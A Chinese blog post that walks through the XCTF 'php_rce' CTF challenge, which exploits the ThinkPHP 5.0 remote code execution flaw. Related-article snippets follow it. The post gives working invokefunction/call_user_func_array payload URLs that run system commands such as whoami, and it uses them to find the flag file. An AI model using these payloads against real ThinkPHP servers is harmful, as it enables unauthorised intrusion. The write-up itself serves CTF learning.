攻防世界web高手进阶php_rce,CTF-攻防世界-web-php_rce(ThinkPHP远程代码执行)

最新推荐文章于 2024-05-24 23:30:00 发布
最新推荐文章于 2024-05-24 23:30:00 发布
阅读量378 收藏 2
点赞数
文章标签: 攻防世界web高手进阶php_rce

题目

今天做CTF的时候,遇到下面这道题,看上去应该跟ThinkPHP版本5的相关漏洞。之前听过ThinkPHP有漏洞,具体情况不清楚。。。

f5a5ea6fa2f34470374d9568ada37679.png     

30a34115bc6da54761a0071330b91201.png

解题过程

去vulhub上搜了下ThinkPHP,还真有,把docker容器打开看了下,页面一摸一样哈哈:

10b5dd88b08896cccd34acf6f0c418f6.png

这是一个远程代码执行漏洞,先学习vulhub复现这个漏洞的过程:

输入:http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,可执行phpinfo:

238133a9f2ee2e57cc70ea9ec80c58e6.png

拉到页面底部,看到ThinkPHP的版本是5.0.20:

187417875016f55f1409ed39e60143ca.png

可以执行phpinfo,那可不可以执行其他命令呢?查了一下网上的payload,如下:

输入:http://your-ip:8080/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

返回:www-data www-data

再回到CTF的这道题,应该考的就是这个命令执行的漏洞:

输出:成功执行phpinfo

再执行ls命令查看当前目录

返回如下,再把index.php和router.php打开看了一下,木有发现flag,再把request和response也检查了下,也木有flag。。

f188414324c6223025c035b5ccd68635.png

再逐级查看上级目录,最终看到一个名为flag的文件:

返回:

c31718909a98f6c2759f870109e4d0a6.png

查看一下flag的内容:

成功找到flag

看了其他人写WP,有更方便的查找文件的linux命令:find / -name "*flag*" (linux命令硬伤来了 ...>_<....>

返回:

3561fe3af5457add31024f8ad86c2a1e.png

比我一级一级的找省事多了。。

weixin_39637924
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界 web进阶 php_rce远程命令执行 thinkphp5 rce漏洞】
Hrain7的博客
11-15 909
远程命令执行 thinkphp5 rec漏洞 具体执行语句可参考大佬的博客 ThinkPHP 5.x远程命令执行漏洞分析与复现 - 渗透测试中心 - 博客园 其实就在网上搜一下thinkphp5 rec漏洞 改一下payload 就行 ...
攻防世界】三 --- php_rce
qq_43168364的博客
12-23 438
题目 — php_rce 一、writeup 主页中提示使用了ThinkPHP V5 在github中搜一下ThinkPHP V5的相关漏洞,可以找到一些 由于我们不知其具体的版本,随便找一个执行一下,这里选择第一个 会显出了root 说明thinkphp的版本可能就是:5.0.22,在选择下面的命令执行paylaod执行 可以执行命令 执行find命令查找flag相关文件 可以在根目录下找到flag文件 使用cat命令可以看到flag 二、知识点 Thinkphp5 的 5.0.22
ctf攻防世界 WEB题:php_rce
qq_30889301的博客
05-09 972
ThinkPHP是一个基于PHP语言的开源Web应用框架,它提供了一系列的工具和组件,可以帮助开发人员更快速、更高效地构建Web应用程序。ThinkPHP框架具有简单易用、高效稳定、安全可靠等特点,被广泛应用于各种Web应用程序的开发中。对于thinkphp框架Github上有一个专用的漏洞验证工具:https://github.com/zangcc/Aazhen-v3.1。进入靶场后会看到以下内容,非常直观的说明了自己是thinkphp框架。此工具已经给一个可用的url案例,我们只需要更改就可以了。
Ctfshow web入门 thinkphp专题
feng的博客
04-25 3424
web569 看一下thinkphp3.2.3官方手册,看完就都懂了: ThinkPHP3.2.3完全开发手册 首先就是路由的方式: http://serverName/index.php/模块/控制器/操作 此外就是默认是不区分大小写的,由'URL_CASE_INSENSITIVE' => true,这个配置决定。 URL模式的话,默认是PATHINFO模式,即本题考察的模式。 直接访问即可: /index.php/admin/login/ctfshowlogin web570 下载源码,在C
[CTF_网络安全] 攻防世界 php_rce 解题详析
最新发布
Z4400840的博客
05-24 1171
PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的一种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),攻击者通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器的控制。下面简单介绍一种常见的远程 RCE 漏洞利用方式,即利用 PHP 中的eval函数实现 RCE 的方式。
ctfshow web入门(thinkphp专题)
qq_53263789的博客
02-09 764
569 URL模式 查阅手册:URL模式 · ThinkPHP3.2.3完全开发手册 http://serverName/index.php/模块/控制器/操作 payload: 普通模式:/?m=Admin&c=Login&a=ctfshowLogin Pathinfo模式:/index.php/Admin/Login/ctfshowLogin 兼容模式:/?s=/Admin/Login/ctfshowLogin 570 路由 发现路由: 根据手册: 直接构造:这里直接执行不可以
XCTF-攻防世界CTF平台-Web类——3、php_rceThinkPHP V5.0框架远程代码执行漏洞)
Onlyone_1314的博客
09-03 1100
先访问题目场景: 主页提示我们:网页使用的是ThinkPHP框架,版本为5.0 这道题主要是考察:ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本。 攻击的exp是:http://111.200.241.244:61059/index.php?s=index/\think\app/invokefuncti
CTF——Thinkphp5远程命令执行漏洞利用
qq_45521281的博客
05-03 7394
[BJDCTF 2nd]old-hack(5.0.23) 进入之后: 打开页面,页面提示powered by Thinkphp。说明可能和thinkphp框架有关。也确实如此,这里用到了thinkphp5的远程命令执行漏洞。 Thinkphp5远程命令执行漏洞 漏洞描述:由于thinkphp对框架中的核心Requests类的method方法提供了表单请求伪造,该功能利用 $_POST['_meth...
CTFWeb方向练习题)(持续更新)
m0_56010012的博客
02-23 5146
1.Training-WWW-Robots 打开应用场景,如下: 网址后面添加/robots.txt 查看其中内容(robots协议也叫robots.txt(统一小写)是一种存放于网站根目录下的ASCII编码的文本文件),内容如下: 根据提示,访问/fl0g.php,得到flag值。 ...
SMBGhost_RCE_PoC-master.zip
06-11
标题中的"SMBGhost_RCE_PoC-master.zip"是一个压缩包文件,其中包含了与名为"SMBGhost"的安全漏洞相关的远程代码执行RCE)的概念验证(PoC)代码。这个漏洞被称为CVE-2020-0796,它是在服务器消息块版本3(SMBv3)...
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
unrar库作为第三方依赖项合并到Chrome OS中是合理的,尽管没有显示其用法的代码引用。 在缓解策略方面,有几种可行的选择可供考虑: 完全修复:将 Winrar 更新到 6.23+ 将完全修复该问题。 修补程序
fastjson_rce_tool-master.zip
05-14
本文将深入探讨Fastjson中的远程代码执行RCE)漏洞,并介绍“fastjson_rce_tool-master”这个工具的相关知识。 Fastjson RCE漏洞通常发生在Fastjson解析不安全的JSON字符串时,允许攻击者通过构造特定的输入,...
远程POC-SMBGhost_RCE_PoC.zip
06-09
CVE-2020-0796漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏...攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出题人申请重新对过渡进行修改发布的权利,但对每个题均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 对已提供Dockerfile...
记一道thinkphp题引发的思考
Sentiment的博客
05-24 1208
本篇仅代表个人观点。 ctfshow web571 先看题—ctfshow web571 提示:黑客建立了控制器后门 所以直接从控制器中找利用点,发现/Home/Controller/indexController.class.php中控制器可传参n,并且在最后会被渲染 public function index($n=''){ $this->show('<style type="text/css">*{ padding: 0; margin: 0; } div{ padding:
网盾安全学院综合靶场-ThinkPHP5 远程代码执行漏洞通关功略
m0_54360887的博客
02-24 3452
漏洞概述 我们知道在ThinkPHP5中是有远程代码执行漏洞的。这个漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。 write up 靶场地址:http://ctf.wangdun.cn 靶场信息: 影响范围 ThinkPHP 5.0.全版本 这个漏洞在测试当中发现该漏洞并不通杀,还是得看复现的版本,目前所测试的情况如下: 当前映射80端口为47052,我们访问该地址 我们可以构造payload来测试下命令执行漏洞: ..
ctfshow ThinkPHP篇—3.2.3(569-578)
羽的博客
08-05 1874
文章目录web569相关内容题解web570web571web572web573web574web575web576web577web578 web569 相关内容 参考thinkphp手册 为了访问下图中的index方法并输出hello 123我们可以通过下面四种模式。 PATHINFO模式 http://localhost/index.php/Home/Index/index/name/123/ 普通模式 http://localhost/index.php?m=Home&c=Index&a
ThinkPHP5RCE漏洞复现
飞雪 SecurityBlog
06-16 249
Payload:/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
攻防世界——Web高手区初试
qq_45746876的博客
03-14 243
攻防世界——Web高手区初试前言1.2.3.php_rce 前言 由于放假的原因,好久好久都没有更新了,整个人懒得就离谱,啥也不太想做,所以就停更了好久好久,虽然Kali网络渗透测试课程结束了,但是停课不停学,所以还是得让自己多学一点儿东西,多做一些总结叭 1. 2. 3.php_rce 拿到题目,先看看里面的东西,但是下面这几个链接点进去都是真实的场景,题目本身也没有提示,所以就先看看 ThinkPHP5 还有 V5.0版本是啥,百度发现ThinkPHP框架的V5.0版本是有远程代码执行漏洞的,于是找到
攻防世界php_rce
08-26
攻防世界中的php_rce是指一种利用PHP解释器的远程代码执行漏洞进行攻击和防御的技术。这种漏洞可以允许攻击者将恶意的PHP代码注入到服务器上,并执行任意命令。引用中的payload是构造了一个用于执行"ls /flag"命令的payload,而引用中的payload则是用于执行"cat /flag"命令的。这些payload利用了PHP解释器中的函数调用漏洞,通过构造特定的函数调用参数来执行系统命令。所以,这些payload可以用于远程执行系统命令,如列出/flag目录下的文件或显示/flag文件的内容。请注意,这些payload仅用于演示和研究目的,并且在现实环境中使用它们是违法的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [攻防世界-web篇(php_rce)详解](https://blog.csdn.net/qq_54803507/article/details/127041653)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值